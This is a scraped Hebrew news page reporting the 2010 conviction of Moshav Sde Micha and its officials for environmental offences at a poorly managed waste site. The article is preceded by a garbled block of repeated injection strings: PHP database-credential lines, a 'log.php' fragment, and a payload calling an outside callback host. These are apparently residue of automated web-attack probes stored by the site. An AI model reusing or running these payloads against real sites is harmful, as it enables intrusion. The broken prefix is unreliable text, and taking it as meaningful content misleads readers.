$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> מנהלים באגודה השיתופית שדות מיכה הורשעו בעבירות על חוקי איכות הסביבה
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מושב שדות מיכה הורשע בעבירות על חוקי איכות סביבה

תאריך: 21/09/2010 15:51   מחבר: מערכת האתר

מושב שדות מיכה הפעיל אתר לסילוק פסולת בסמוך למושב. הפעלת האתר לא בוצעה בהתאם להוראות חוק למניעת מפגעים . פקחים של המשרד לאיכות הסביבה ביקרו באתר ומצאו מפגעים סביבתיים. בעקבות דוח ביקורת שנערך הוחלט להגיש כתב אישום נגד המושב, הרכז ויו"ר ועד המושב. הדיון התנהל בבית משפט השלום בירושלים  בתיק פלילי 3217/01.

בתום הדיונים הרשיע בית המשפט את הנאשמים בעבירות הבאות:

חוק מניעת מפגעים - לפי הוראות החוק על מפעיל אתר לסילוק פסולת לתחזק אותו ולהפעילו כך שלא יהיו זיהום אוויר וריחות רעים מהאתר. לצורך כך חובה לכסות יום יום את כל הפסולת באמצעות שכבת חול מהודקת בעובי 15 ס"מ ולהחזיק חומר כיסוי בכמות שתספיק ל- 14 ימי עבודה באתר. על המפעיל לקבוע סדרי עבודה באתר ולמנוע השלכת פסולת אלא במקומות המסומנים באתר.

לפי כתב האישום עולה כי באתר המדובר הפסולת לא כוסתה, שקיות פסולות עפו למקומות אחרים, לא התקינו גדר סביב האתר, כביש הגישה לאתר לא נסלל מה שגרם למפגעים של אבק מכניסה ויציאה של משאיות הפסולת.

חוק שמירת הנקיון - לפי החוק אסור ללכלך את רשות הרבים ולגרום לריחות רעים. בעצם העובדה שהמושב לא גידר את האתר הוא גרם ללכלוך ברשות הרבים.

זאת ועוד. נוזלי הפסולת הרעילים חלחלו לתוך האדמה, זרמו עם הגשם לואדי סמוך ומשם לשטחי מרעה שזוהמו. המושב התקין בריכה לקליטת התשטיפים. הבריכה נסדקה ולא תוקנה וגרמה לחלחול מים מזוהמים לקרקע.

במהלך המשפט הוכח כי הנאשמים היו מודעים לעבירות על חוקי הסביבה ובכל זאת לא הוכיחו כי עשו את שניתן למניעת העבירות ולכן הורשעו.